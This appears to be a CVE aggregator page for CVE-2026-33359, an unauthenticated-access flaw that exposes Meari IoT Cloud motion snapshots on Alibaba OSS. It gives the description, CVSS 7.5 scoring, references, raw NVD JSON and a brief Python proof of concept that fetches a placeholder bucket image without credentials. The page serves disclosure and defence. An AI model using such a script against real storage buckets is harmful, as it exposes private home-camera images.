CVE-2026-33359

Description

In Meari IoT Cloud alert image storage on Alibaba OSS (latest observed; storage service version not disclosed), motion snapshots are retrievable without authentication, signed URLs, or expiry enforcement. URLs function as direct object references and remain valid beyond expected operational windows.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Meari IoT Cloud (最新观测版本，具体版本号未披露)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# PoC for CVE-2026-33359
# This script demonstrates how an unauthenticated user can access snapshot images.

# Example URL structure based on the vulnerability description
target_url = "http://vulnerable-oss-bucket.oss-region.aliyuncs.com/alert_images/snapshot_timestamp.jpg"

try:
    # Send request without authentication headers or tokens
    response = requests.get(target_url, timeout=10)
    
    if response.status_code == 200:
        print(f"[+] Vulnerability Confirmed!")
        print(f"[+] Image retrieved successfully. Size: {len(response.content)} bytes")
        print(f"[+] Content-Type: {response.headers.get('Content-Type')}")
    else:
        print(f"[-] Access denied or not found. Status code: {response.status_code}")
        
except Exception as e:
    print(f"[!] Error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33359
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33359
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33359/
[4] VulDB https://vuldb.com/cve/CVE-2026-33359
[5] https://github.com/xn0tsa/nobody-puts-baby-in-a-corner
[6] https://www.runzero.com/advisories/meari-unauthenticated-alert-image-access-in-cloud-object-storage-cve-2026-33359/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33359", "sourceIdentifier": "44488dab-36db-4358-99f9-bc116477f914", "published": "2026-05-11T17:16:30.843", "lastModified": "2026-05-11T17:16:30.843", "vulnStatus": "Received", "cveTags": [{"sourceIdentifier": "44488dab-36db-4358-99f9-bc116477f914", "tags": ["exclusively-hosted-service"]}], "descriptions": [{"lang": "en", "value": "In Meari IoT Cloud alert image storage on Alibaba OSS (latest observed; storage service version not disclosed), motion snapshots are retrievable without authentication, signed URLs, or expiry enforcement. URLs function as direct object references and remain valid beyond expected operational windows."}], "metrics": {"cvssMetricV31": [{"source": "44488dab-36db-4358-99f9-bc116477f914", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "44488dab-36db-4358-99f9-bc116477f914", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/xn0tsa/nobody-puts-baby-in-a-corner", "source": "44488dab-36db-4358-99f9-bc116477f914"}, {"url": "https://www.runzero.com/advisories/meari-unauthenticated-alert-image-access-in-cloud-object-storage-cve-2026-33359/", "source": "44488dab-36db-4358-99f9-bc116477f914"}]}}